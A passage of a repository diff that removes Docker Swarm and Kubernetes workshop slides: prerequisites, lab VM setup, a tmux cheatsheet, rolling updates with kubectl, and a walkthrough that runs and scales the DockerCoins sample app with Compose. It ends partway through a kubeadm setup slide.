- `extends` doesn't work with `docker stack deploy`
|
||||
|
||||
(But you can use `docker-compose config` to "flatten" your configuration)
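
That flattening workaround could look like this (file and stack names are assumptions):

```bash
docker-compose -f docker-compose.yml -f docker-compose.prod.yml config > flat.yml
docker stack deploy mystack --compose-file flat.yml
```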
|
||||
|
||||
---
|
||||
|
||||
## Summary
|
||||
|
||||
- We've seen how to set up a Swarm
|
||||
|
||||
- We've used it to host our own registry
|
||||
|
||||
- We've built our app container images
|
||||
|
||||
- We've used the registry to host those images
|
||||
|
||||
- We've deployed and scaled our application
|
||||
|
||||
- We've seen how to use Compose to streamline deployments
|
||||
|
||||
- Awesome job, team!
|
||||
@@ -1,169 +0,0 @@
|
||||
# Pre-requirements
|
||||
|
||||
- Computer with internet connection and a web browser
|
||||
|
||||
- For instructor-led workshops: an SSH client to connect to remote machines
|
||||
|
||||
- on Linux, OS X, FreeBSD... you are probably all set
|
||||
|
||||
- on Windows, get [putty](http://www.putty.org/),
|
||||
Microsoft [Win32 OpenSSH](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH),
|
||||
[Git BASH](https://git-for-windows.github.io/), or
|
||||
[MobaXterm](http://mobaxterm.mobatek.net/)
|
||||
|
||||
- A tiny little bit of Docker knowledge
|
||||
|
||||
(that's totally OK if you're not a Docker expert!)
|
||||
|
||||
---
|
||||
|
||||
class: in-person, extra-details
|
||||
|
||||
## Nice-to-haves
|
||||
|
||||
- [Mosh](https://mosh.org/) instead of SSH, if your internet connection tends to lose packets
|
||||
<br/>(available with `(apt|yum|brew) install mosh`; then connect with `mosh user@host`)
|
||||
|
||||
- [GitHub](https://github.com/join) account
|
||||
<br/>(if you want to fork the repo)
|
||||
|
||||
- [Gitter](https://gitter.im/) account
|
||||
<br/>(to join the conversation during the workshop)
|
||||
|
||||
- [Slack](https://community.docker.com/registrations/groups/4316) account
|
||||
<br/>(to join the conversation after the workshop)
|
||||
|
||||
- [Docker Hub](https://hub.docker.com) account
|
||||
<br/>(it's one way to distribute images on your cluster)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Extra details
|
||||
|
||||
- This slide should have a little magnifying glass in the top left corner
|
||||
|
||||
(If it doesn't, it's because CSS is hard — Jérôme is only a backend person, alas)
|
||||
|
||||
- Slides with that magnifying glass indicate slides providing extra details
|
||||
|
||||
- Feel free to skip them if you're in a hurry!
|
||||
|
||||
---
|
||||
|
||||
## Hands-on sections
|
||||
|
||||
- The whole workshop is hands-on
|
||||
|
||||
- We will see Docker and Kubernetes in action
|
||||
|
||||
- You are invited to reproduce all the demos
|
||||
|
||||
- All hands-on sections are clearly identified, like the gray rectangle below
|
||||
|
||||
.exercise[
|
||||
|
||||
- This is the stuff you're supposed to do!
|
||||
- Go to [container.training](http://container.training/) to view these slides
|
||||
- Join the [chat room](@@CHAT@@)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: pic, in-person
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
## You get five VMs
|
||||
|
||||
- Each person gets 5 private VMs (not shared with anybody else)
|
||||
- Kubernetes has been deployed and pre-configured on these machines
|
||||
- They'll remain up until the day after the tutorial
|
||||
- You should have a little card with login+password+IP addresses
|
||||
- You can automatically SSH from one VM to another
|
||||
|
||||
.exercise[
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(seq 1 5); do
|
||||
ssh -o StrictHostKeyChecking=no node$N true
|
||||
done
|
||||
for N in $(seq 1 5); do
|
||||
(
|
||||
docker-machine rm -f node$N
|
||||
ssh node$N "docker ps -aq | xargs -r docker rm -f"
|
||||
ssh node$N sudo rm -f /etc/systemd/system/docker.service
|
||||
ssh node$N sudo systemctl daemon-reload
|
||||
echo Restarting node$N.
|
||||
ssh node$N sudo systemctl restart docker
|
||||
echo Restarted node$N.
|
||||
) &
|
||||
done
|
||||
wait
|
||||
```
|
||||
-->
|
||||
|
||||
- Log into the first VM (`node1`) with SSH or MOSH
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to node1
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^D
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only check out/copy the code on `node1`
|
||||
|
||||
- When we use the other nodes, it will mostly be through the Docker API
|
||||
|
||||
- We will log into other nodes only for initial setup and a few "out of band" operations
|
||||
<br/>(checking internal logs, debugging...)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
@@ -1,245 +0,0 @@
|
||||
# Pre-requirements
|
||||
|
||||
- Computer with internet connection and a web browser
|
||||
|
||||
- For instructor-led workshops: an SSH client to connect to remote machines
|
||||
|
||||
- on Linux, OS X, FreeBSD... you are probably all set
|
||||
|
||||
- on Windows, get [putty](http://www.putty.org/),
|
||||
Microsoft [Win32 OpenSSH](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH),
|
||||
[Git BASH](https://git-for-windows.github.io/), or
|
||||
[MobaXterm](http://mobaxterm.mobatek.net/)
|
||||
|
||||
- For self-paced learning: SSH is not necessary if you use
|
||||
[Play-With-Docker](http://www.play-with-docker.com/)
|
||||
|
||||
- Some Docker knowledge
|
||||
|
||||
(but that's OK if you're not a Docker expert!)
|
||||
|
||||
---
|
||||
|
||||
class: in-person, extra-details
|
||||
|
||||
## Nice-to-haves
|
||||
|
||||
- [Mosh](https://mosh.org/) instead of SSH, if your internet connection tends to lose packets
|
||||
<br/>(available with `(apt|yum|brew) install mosh`; then connect with `mosh user@host`)
|
||||
|
||||
- [GitHub](https://github.com/join) account
|
||||
<br/>(if you want to fork the repo)
|
||||
|
||||
- [Gitter](https://gitter.im/) account
|
||||
<br/>(to join the conversation during the workshop)
|
||||
|
||||
- [Slack](https://community.docker.com/registrations/groups/4316) account
|
||||
<br/>(to join the conversation after the workshop)
|
||||
|
||||
- [Docker Hub](https://hub.docker.com) account
|
||||
<br/>(it's one way to distribute images on your cluster)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Extra details
|
||||
|
||||
- This slide should have a little magnifying glass in the top left corner
|
||||
|
||||
(If it doesn't, it's because CSS is hard — Jérôme is only a backend person, alas)
|
||||
|
||||
- Slides with that magnifying glass indicate slides providing extra details
|
||||
|
||||
- Feel free to skip them if you're in a hurry!
|
||||
|
||||
---
|
||||
|
||||
## Hands-on sections
|
||||
|
||||
- The whole workshop is hands-on
|
||||
|
||||
- We will see Docker in action
|
||||
|
||||
- You are invited to reproduce all the demos
|
||||
|
||||
- All hands-on sections are clearly identified, like the gray rectangle below
|
||||
|
||||
.exercise[
|
||||
|
||||
- This is the stuff you're supposed to do!
|
||||
- Go to [container.training](http://container.training/) to view these slides
|
||||
- Join the [chat room](@@CHAT@@)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
# VM environment
|
||||
|
||||
- To follow along, you need a cluster of five Docker Engines
|
||||
|
||||
- If you are doing this with an instructor, see next slide
|
||||
|
||||
- If you are doing (or re-doing) this on your own, you can:
|
||||
|
||||
- create your own cluster (local or cloud VMs) with Docker Machine
|
||||
([instructions](https://github.com/jpetazzo/orchestration-workshop/tree/master/prepare-machine))
|
||||
|
||||
- use [Play-With-Docker](http://play-with-docker.com) ([instructions](https://github.com/jpetazzo/orchestration-workshop#using-play-with-docker))
|
||||
|
||||
- create a bunch of clusters for you and your friends
|
||||
([instructions](https://github.com/jpetazzo/orchestration-workshop/tree/master/prepare-vms))
|
||||
|
||||
---
|
||||
|
||||
class: pic, in-person
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
## You get five VMs
|
||||
|
||||
- Each person gets 5 private VMs (not shared with anybody else)
|
||||
- They'll remain up until the day after the tutorial
|
||||
- You should have a little card with login+password+IP addresses
|
||||
- You can automatically SSH from one VM to another
|
||||
|
||||
.exercise[
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(seq 1 5); do
|
||||
ssh -o StrictHostKeyChecking=no node$N true
|
||||
done
|
||||
for N in $(seq 1 5); do
|
||||
(
|
||||
docker-machine rm -f node$N
|
||||
ssh node$N "docker ps -aq | xargs -r docker rm -f"
|
||||
ssh node$N sudo rm -f /etc/systemd/system/docker.service
|
||||
ssh node$N sudo systemctl daemon-reload
|
||||
echo Restarting node$N.
|
||||
ssh node$N sudo systemctl restart docker
|
||||
echo Restarted node$N.
|
||||
) &
|
||||
done
|
||||
wait
|
||||
```
|
||||
-->
|
||||
|
||||
- Log into the first VM (`node1`) with SSH or MOSH
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to node1
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^D
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## If doing or re-doing the workshop on your own ...
|
||||
|
||||
- Use [Play-With-Docker](http://www.play-with-docker.com/)!
|
||||
|
||||
- Main differences:
|
||||
|
||||
- you don't need to SSH to the machines
|
||||
<br/>(just click on the node that you want to control in the left tab bar)
|
||||
|
||||
- Play-With-Docker automagically detects exposed ports
|
||||
<br/>(and displays them as little badges with port numbers, above the terminal)
|
||||
|
||||
- You can access HTTP services by clicking on the port numbers
|
||||
|
||||
- exposing TCP services requires something like
|
||||
[ngrok](https://ngrok.com/)
|
||||
or [supergrok](https://github.com/jpetazzo/orchestration-workshop#using-play-with-docker)
|
||||
|
||||
<!--
|
||||
|
||||
- If you use VMs deployed with Docker Machine:
|
||||
|
||||
- you won't have pre-authorized SSH keys to bounce across machines
|
||||
|
||||
- you won't have host aliases
|
||||
|
||||
-->
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Using Play-With-Docker
|
||||
|
||||
- Open a new browser tab to [www.play-with-docker.com](http://www.play-with-docker.com/)
|
||||
|
||||
- Confirm that you're not a robot
|
||||
|
||||
- Click on "ADD NEW INSTANCE": congratulations, you have your first Docker node!
|
||||
|
||||
- When you need more nodes, just click on "ADD NEW INSTANCE" again
|
||||
|
||||
- Note the countdown in the corner; when it expires, your instances are destroyed
|
||||
|
||||
- If you give your URL to somebody else, they can access your nodes too
|
||||
<br/>
|
||||
(You can use that for pair programming, or to get help from a mentor)
|
||||
|
||||
- Loving it? Not loving it? Tell the wonderful authors,
|
||||
[@marcosnils](https://twitter.com/marcosnils) &
|
||||
[@xetorthio](https://twitter.com/xetorthio)!
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only check out/copy the code on `node1`
|
||||
|
||||
- When we use the other nodes, it will mostly be through the Docker API
|
||||
|
||||
- We will log into other nodes only for initial setup and a few "out of band" operations
|
||||
<br/>(checking internal logs, debugging...)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
@@ -1,197 +0,0 @@
|
||||
# Rolling updates
|
||||
|
||||
- By default (without rolling updates), when a scaled resource is updated:
|
||||
|
||||
- new pods are created
|
||||
|
||||
- old pods are terminated
|
||||
|
||||
- ... all at the same time
|
||||
|
||||
- if something goes wrong, ¯\\\_(ツ)\_/¯
|
||||
|
||||
---
|
||||
|
||||
## Rolling updates
|
||||
|
||||
- With rolling updates, when a resource is updated, it happens progressively
|
||||
|
||||
- Two parameters determine the pace of the rollout: `maxUnavailable` and `maxSurge`
|
||||
|
||||
- They can be specified in absolute number of pods, or percentage of the `replicas` count
|
||||
|
||||
- At any given time ...
|
||||
|
||||
- there will always be at least `replicas`-`maxUnavailable` pods available
|
||||
|
||||
- there will never be more than `replicas`+`maxSurge` pods in total
|
||||
|
||||
- there will therefore be up to `maxUnavailable`+`maxSurge` pods being updated
|
||||
|
||||
- We have the possibility to rollback to the previous version
|
||||
<br/>(if the update fails or is unsatisfactory in any way)
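
A quick worked example (the numbers are illustrative): with `replicas: 10`, `maxUnavailable: 25%`, and `maxSurge: 25%`, the percentages resolve to whole pods (rounding down to 2 for `maxUnavailable`, up to 3 for `maxSurge`), so at least 8 pods remain available and at most 13 pods exist at any point during the rollout.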
|
||||
|
||||
---
|
||||
|
||||
## Rolling updates in practice
|
||||
|
||||
- As of Kubernetes 1.8, we can do rolling updates with:
|
||||
|
||||
`deployments`, `daemonsets`, `statefulsets`
|
||||
|
||||
- Editing one of these resources will automatically result in a rolling update
|
||||
|
||||
- Rolling updates can be monitored with the `kubectl rollout` subcommand
|
||||
|
||||
---
|
||||
|
||||
## Building a new version of the `worker` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stacks` directory:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/stacks
|
||||
```
|
||||
|
||||
- Edit `dockercoins/worker/worker.py`, update the `sleep` line to sleep 1 second
|
||||
|
||||
- Build a new tag and push it to the registry:
|
||||
```bash
|
||||
export REGISTRY=localhost:3xxxx TAG=v0.2
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Rolling out the new version of the `worker` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's monitor what's going on by opening a few terminals and running:
|
||||
```bash
|
||||
kubectl get pods -w
|
||||
kubectl get replicasets -w
|
||||
kubectl get deployments -w
|
||||
```
|
||||
|
||||
- Update `worker` either with `kubectl edit`, or by running:
|
||||
```bash
|
||||
kubectl set image deploy worker worker=$REGISTRY/worker:$TAG
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
That rollout should be pretty quick. What shows up in the web UI?
|
||||
|
||||
---
|
||||
|
||||
## Rolling out a boo-boo
|
||||
|
||||
- What happens if we make a mistake?
|
||||
|
||||
.exercise[
|
||||
|
||||
- Update `worker` by specifying a non-existent image:
|
||||
```bash
|
||||
export TAG=v0.3
|
||||
kubectl set image deploy worker worker=$REGISTRY/worker:$TAG
|
||||
```
|
||||
|
||||
- Check what's going on:
|
||||
```bash
|
||||
kubectl rollout status deploy worker
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
Our rollout is stuck. However, the app is not dead (just 10% slower).
|
||||
|
||||
---
|
||||
|
||||
## Recovering from a bad rollout
|
||||
|
||||
- We could push some `v0.3` image
|
||||
|
||||
(the pod retry logic will eventually catch it and the rollout will proceed)
|
||||
|
||||
- Or we could invoke a manual rollback
|
||||
|
||||
.exercise[
|
||||
|
||||
- Cancel the deployment and wait for the dust to settle:
|
||||
```bash
|
||||
kubectl rollout undo deploy worker
|
||||
kubectl rollout status deploy worker
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Changing rollout parameters
|
||||
|
||||
- We want to:
|
||||
|
||||
- revert to `v0.1`
|
||||
- be conservative on availability (always have desired number of available workers)
|
||||
- be aggressive on rollout speed (update more than one pod at a time)
|
||||
- give some time to our workers to "warm up" before starting more
|
||||
|
||||
The corresponding changes can be expressed in the following YAML snippet:
|
||||
|
||||
.small[
|
||||
```yaml
|
||||
spec:
|
||||
template:
|
||||
spec:
|
||||
containers:
|
||||
- name: worker
|
||||
image: $REGISTRY/worker:v0.1
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxUnavailable: 0
|
||||
maxSurge: 3
|
||||
minReadySeconds: 10
|
||||
```
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Applying changes through a YAML patch
|
||||
|
||||
- We could use `kubectl edit deployment worker`
|
||||
|
||||
- But we could also use `kubectl patch` with the exact YAML shown before
|
||||
|
||||
.exercise[
|
||||
|
||||
.small[
|
||||
|
||||
- Apply all our changes and wait for them to take effect:
|
||||
```bash
|
||||
kubectl patch deployment worker -p "
|
||||
spec:
|
||||
template:
|
||||
spec:
|
||||
containers:
|
||||
- name: worker
|
||||
image: $REGISTRY/worker:v0.1
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxUnavailable: 0
|
||||
maxSurge: 3
|
||||
minReadySeconds: 10
|
||||
"
|
||||
kubectl rollout status deployment worker
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
@@ -1,468 +0,0 @@
|
||||
# Our sample application
|
||||
|
||||
- Visit the GitHub repository with all the materials of this workshop:
|
||||
<br/>https://github.com/jpetazzo/orchestration-workshop
|
||||
|
||||
- The application is in the [dockercoins](
|
||||
https://github.com/jpetazzo/orchestration-workshop/tree/master/dockercoins)
|
||||
subdirectory
|
||||
|
||||
- Let's look at the general layout of the source code:
|
||||
|
||||
there is a Compose file [docker-compose.yml](
|
||||
https://github.com/jpetazzo/orchestration-workshop/blob/master/dockercoins/docker-compose.yml) ...
|
||||
|
||||
... and 4 other services, each in its own directory:
|
||||
|
||||
- `rng` = web service generating random bytes
|
||||
- `hasher` = web service computing hash of POSTed data
|
||||
- `worker` = background process using `rng` and `hasher`
|
||||
- `webui` = web interface to watch progress
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Compose file format version
|
||||
|
||||
*Particularly relevant if you have used Compose before...*
|
||||
|
||||
- Compose 1.6 introduced support for a new Compose file format (aka "v2")
|
||||
|
||||
- Services are no longer at the top level, but under a `services` section
|
||||
|
||||
- There has to be a `version` key at the top level, with value `"2"` (as a string, not an integer)
|
||||
|
||||
- Containers are placed on a dedicated network, making links unnecessary
|
||||
|
||||
- There are other minor differences, but upgrade is easy and straightforward
|
||||
|
||||
---
|
||||
|
||||
## Links, naming, and service discovery
|
||||
|
||||
- Containers can have network aliases (resolvable through DNS)
|
||||
|
||||
- Compose file version 2+ makes each container reachable through its service name
|
||||
|
||||
- Compose file version 1 did require "links" sections
|
||||
|
||||
- Our code can connect to services using their short name
|
||||
|
||||
(instead of e.g. IP address or FQDN)
|
||||
|
||||
- Network aliases are automatically namespaced
|
||||
|
||||
(i.e. you can have multiple apps declaring and using a service named `database`)
|
||||
|
||||
---
|
||||
|
||||
## Example in `worker/worker.py`
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## What's this application?
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
(DockerCoins 2016 logo courtesy of [@XtlCnslt](https://twitter.com/xtlcnslt) and [@ndeloof](https://twitter.com/ndeloof). Thanks!)
|
||||
|
||||
---
|
||||
|
||||
## What's this application?
|
||||
|
||||
- It is a DockerCoin miner! 💰🐳📦🚢
|
||||
|
||||
--
|
||||
|
||||
- No, you can't buy coffee with DockerCoins
|
||||
|
||||
--
|
||||
|
||||
- How DockerCoins works (sketched in code after this list):
|
||||
|
||||
  - `worker` asks `rng` to generate a few random bytes
|
||||
|
||||
- `worker` feeds these bytes into `hasher`
|
||||
|
||||
- and repeat forever!
|
||||
|
||||
- every second, `worker` updates `redis` to indicate how many loops were done
|
||||
|
||||
- `webui` queries `redis`, and computes and exposes "hashing speed" in your browser
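
Below is a minimal sketch of that loop, assuming the `requests` and `redis` Python libraries and the service names above (it is illustrative, not the actual `worker.py`):

```
import time

import redis
import requests

db = redis.Redis(host="redis")
loops = 0
while True:
    data = requests.get("http://rng/32").content      # ask rng for random bytes
    requests.post("http://hasher/", data=data,
                  headers={"Content-Type": "application/octet-stream"})
    loops += 1
    db.set("hashes", loops)  # the real worker updates this about once per second
    time.sleep(0.1)
```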
|
||||
|
||||
---
|
||||
|
||||
## Getting the application source code
|
||||
|
||||
- We will clone the GitHub repository
|
||||
|
||||
- The repository also contains scripts and tools that we will use through the workshop
|
||||
|
||||
.exercise[
|
||||
|
||||
<!--
|
||||
```bash
|
||||
[ -d orchestration-workshop ] && mv orchestration-workshop orchestration-workshop.$$
|
||||
```
|
||||
-->
|
||||
|
||||
- Clone the repository on `node1`:
|
||||
```bash
|
||||
git clone git://github.com/jpetazzo/orchestration-workshop
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
(You can also fork the repository on GitHub and clone your fork if you prefer that.)
|
||||
|
||||
---
|
||||
|
||||
# Running the application
|
||||
|
||||
Without further ado, let's start our application.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `dockercoins` directory, in the cloned repo:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
```
|
||||
|
||||
- Use Compose to build and run all containers:
|
||||
```bash
|
||||
docker-compose up
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Compose tells Docker to build all container images (pulling
|
||||
the corresponding base images), then starts all containers,
|
||||
and displays aggregated logs.
|
||||
|
||||
---
|
||||
|
||||
## Lots of logs
|
||||
|
||||
- The application continuously generates logs
|
||||
|
||||
- We can see the `worker` service making requests to `rng` and `hasher`
|
||||
|
||||
- Let's put that in the background
|
||||
|
||||
.exercise[
|
||||
|
||||
- Stop the application by hitting `^C`
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^C
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
- `^C` stops all containers by sending them the `TERM` signal
|
||||
|
||||
- Some containers exit immediately, others take longer
|
||||
<br/>(because they don't handle `SIGTERM` and end up being killed after a 10s timeout)
|
||||
|
||||
---
|
||||
|
||||
## Restarting in the background
|
||||
|
||||
- Many flags and commands of Compose are modeled after those of `docker`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Start the app in the background with the `-d` option:
|
||||
```bash
|
||||
docker-compose up -d
|
||||
```
|
||||
|
||||
- Check that our app is running with the `ps` command:
|
||||
```bash
|
||||
docker-compose ps
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
`docker-compose ps` also shows the ports exposed by the application.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Viewing logs
|
||||
|
||||
- The `docker-compose logs` command works like `docker logs`
|
||||
|
||||
.exercise[
|
||||
|
||||
- View all logs since container creation and exit when done:
|
||||
```bash
|
||||
docker-compose logs
|
||||
```
|
||||
|
||||
- Stream container logs, starting at the last 10 lines for each container:
|
||||
```bash
|
||||
docker-compose logs --tail 10 --follow
|
||||
```
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^C
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
Tip: use `^S` and `^Q` to pause/resume log output.

---

class: extra-details

## Upgrading from Compose 1.6

.warning[The `logs` command has changed between Compose 1.6 and 1.7!]

- Up to 1.6

  - `docker-compose logs` is the equivalent of `logs --follow`

  - `docker-compose logs` must be restarted if containers are added

- Since 1.7

  - `--follow` must be specified explicitly

  - new containers are automatically picked up by `docker-compose logs`

---

## Connecting to the web UI

- The `webui` container exposes a web dashboard; let's view it

.exercise[

- With a web browser, connect to `node1` on port 8000

- Remember: the `nodeX` aliases are valid only on the nodes themselves

- In your browser, you need to enter the IP address of your node

]

You should see a speed of approximately 4 hashes/second.

More precisely: 4 hashes/second, with regular dips down to zero.
<br/>This is because Jérôme is incapable of writing good frontend code.
<br/>Don't ask. Seriously, don't ask. This is embarrassing.

---

class: extra-details

## Why does the speed seem irregular?

- The app actually has a constant, steady speed: 3.33 hashes/second
  <br/>
  (which corresponds to 1 hash every 0.3 seconds, for *reasons*)

- The worker doesn't update the counter after every loop, but at most once per second

- The speed is computed by the browser, checking the counter about once per second

- Between two consecutive updates, the counter will increase either by 4, or by 0

- The perceived speed will therefore be 4 - 4 - 4 - 0 - 4 - 4 - etc.
  <br/>(five one-second samples at 4 and one at 0 average out to the true 3.33 hashes/second)

*We told you to not ask!!!*

---

## Scaling up the application

- Our goal is to make that performance graph go up (without changing a line of code!)

--

- Before trying to scale the application, we'll figure out if we need more resources

  (CPU, RAM...)

- For that, we will use good old UNIX tools on our Docker node

---

## Looking at resource usage

- Let's look at CPU, memory, and I/O usage

.exercise[

- run `top` to see CPU and memory usage (you should see idle cycles)

- run `vmstat 3` to see I/O usage (si/so = swap in/out, bi/bo = blocks in/out)
  <br/>(the 4 numbers should be almost zero, except `bo` for logging)

]

We have available resources.

- Why?
- How can we use them?

---

## Scaling workers on a single node

- Docker Compose supports scaling
- Let's scale `worker` and see what happens!

.exercise[

- Start one more `worker` container:
  ```bash
  docker-compose scale worker=2
  ```

- Look at the performance graph (it should show a x2 improvement)

- Look at the aggregated logs of our containers (`worker_2` should show up)

- Look at the impact on CPU load with e.g. top (it should be negligible)

]

---

## Adding more workers

- Great, let's add more workers and call it a day, then!

.exercise[

- Start eight more `worker` containers:
  ```bash
  docker-compose scale worker=10
  ```

- Look at the performance graph: does it show a x10 improvement?

- Look at the aggregated logs of our containers

- Look at the impact on CPU load and memory usage

<!--
```bash
sleep 5
killall docker-compose
```
-->

]

---

# Identifying bottlenecks

- You should have seen a 3x speed bump (not 10x)

- Adding workers didn't result in linear improvement

- *Something else* is slowing us down

--

- ... But what?

--

- The code doesn't have instrumentation

- Let's use state-of-the-art HTTP performance analysis!
<br/>(i.e. good old tools like `ab`, `httping`...)
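
For instance, `ab` (Apache Bench) can put a service under load; a minimal sketch (the URL assumes `rng` is published on port 8001, as shown on the next slide):

```bash
# Send 100 requests to rng, 10 at a time, and report latency percentiles
ab -n 100 -c 10 http://localhost:8001/
```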

---

## Accessing internal services

- `rng` and `hasher` are exposed on ports 8001 and 8002

- This is declared in the Compose file:

  ```yaml
  ...
  rng:
    build: rng
    ports:
    - "8001:80"

  hasher:
    build: hasher
    ports:
    - "8002:80"
  ...
  ```

---

## Measuring latency under load

We will use `httping`.

.exercise[

- Check the latency of `rng`:
  ```bash
  httping -c 10 localhost:8001
  ```

- Check the latency of `hasher`:
  ```bash
  httping -c 10 localhost:8002
  ```

]

`rng` has a much higher latency than `hasher`.

---

## Let's draw hasty conclusions

- The bottleneck seems to be `rng`

- *What if* we don't have enough entropy and can't generate enough random numbers?

- We need to scale out the `rng` service on multiple machines!

Note: this is a fiction! We have enough entropy. But we need a pretext to scale out.

(In fact, the code of `rng` uses `/dev/urandom`, which never runs out of entropy...
<br/>
...and is [just as good as `/dev/random`](http://www.slideshare.net/PacSecJP/filippo-plain-simple-reality-of-entropy).)

---

## Clean up

- Before moving on, let's remove those containers

.exercise[

- Tell Compose to remove everything:
  ```bash
  docker-compose down
  ```

]
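
(For reference: if the app had created named volumes, `docker-compose down` would leave them around by default; a sketch of the variant that removes them too:)

```bash
# Also remove named volumes declared in the Compose file
docker-compose down -v
```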

@@ -1,62 +0,0 @@
exclude:
- in-person

chat: FIXME

chapters:
- |
  class: title
  Docker <br/> Orchestration <br/> Workshop
- intro.md
- |
  @@TOC@@
- - prereqs.md
  - versions.md
- |
  class: title

  All right!
  <br/>
  We're all set.
  <br/>
  Let's do this.
- |
  name: part-1

  class: title, self-paced

  Part 1
- sampleapp.md
- |
  class: title

  Scaling out
- swarmkit.md
- creatingswarm.md
- machine.md
- morenodes.md
- - firstservice.md
  - ourapponswarm.md
- - operatingswarm.md
  - netshoot.md
  - swarmnbt.md
  - ipsec.md
  - updatingservices.md
  - healthchecks.md
  - nodeinfo.md
  - swarmtools.md
- - security.md
  - secrets.md
  - leastprivilege.md
  - namespaces.md
  - apiscope.md
  - encryptionatrest.md
  - logging.md
  - metrics.md
  - stateful.md
  - extratips.md
  - end.md
- |
  class: title

  Thank you!

@@ -1,68 +0,0 @@
# Setting up Kubernetes

- How did we set up these Kubernetes clusters that we're using?

--

- We used `kubeadm` on "fresh" EC2 instances with Ubuntu 16.04 LTS
  (a rough sketch of these commands follows the list)

1. Install Docker

2. Install Kubernetes packages

3. Run `kubeadm init` on the master node

4. Setup Weave (the overlay network)
   <br/>
   (that step is just one `kubectl apply` command; discussed later)

5. Run `kubeadm join` on the other nodes (with the token produced by `kubeadm init`)

6. Copy the configuration file generated by `kubeadm init`
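
This is not official installation guidance, just a rough sketch of the sequence above, assuming Ubuntu hosts where Docker and the `kubeadm`/`kubectl` packages are already installed:

```bash
# On the master node: initialize the control plane
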